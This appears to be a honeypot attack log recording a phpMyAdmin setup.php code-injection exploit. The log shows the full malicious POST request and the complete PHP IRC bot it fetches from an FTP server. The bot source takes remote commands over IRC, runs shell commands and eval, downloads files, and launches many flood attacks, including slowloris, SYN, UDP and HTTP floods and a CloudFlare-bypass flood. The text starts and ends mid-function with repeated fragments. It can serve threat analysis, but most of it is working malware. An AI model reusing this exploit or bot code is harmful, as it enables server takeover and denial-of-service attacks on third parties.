$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWLORIS - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWLORIS - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SYN - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SYN - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!! (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - Syn - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - Syn - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - UDP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - UDP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: " . $env . " MB sent / Average: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - TCP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - TCP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
95.216.174.175
Dest. port: 80
Time: 17/02/2019 01:49:26
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS24940 Hetzner Online GmbH
Location: Newland, Helsinki (zipcode 00100)
rDNS: static.175.174.216.95.clients.your-server.de
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.
CVE
CVE-2009-1151
Author
Adrian "pagvac" Pastor
Plugin ID
oosheefee1baixeinief5nociu5shohh
POST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 241
cookie2: $Version="1"
Host: 21.171.51.29
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://21.171.51.29/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=d007a44761984bd2008c50bad4ee5c17
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=d7961c1f90c9e481f0aa6d63b1d8009d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A32%3A%22ftp%3A%2F%2F51%2E38%2E119%2E192%2Fpub%2Fpbot%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 2be6db19e83a9cd7b4923319ce60c662
Type: text/x-php
Size: 39364
URL: ftp://51.38.119.192/pub/pbot.php
<?php
$cfg = array(
"server" => "51.38.119.192",
"port" => "6667",
"key" => "",
"prefix" => "Zombie",
"maxrand" => "8",
"chan" => "#exploitation",
"trigger" => ".",
"hostauth" => "ddos"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - CloudFlare - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - CloudFlare - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - HTTP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - HTTP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - PROXYHTTP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - HTTP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!! (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - TCP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - TCP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWREAD - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWREAD - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
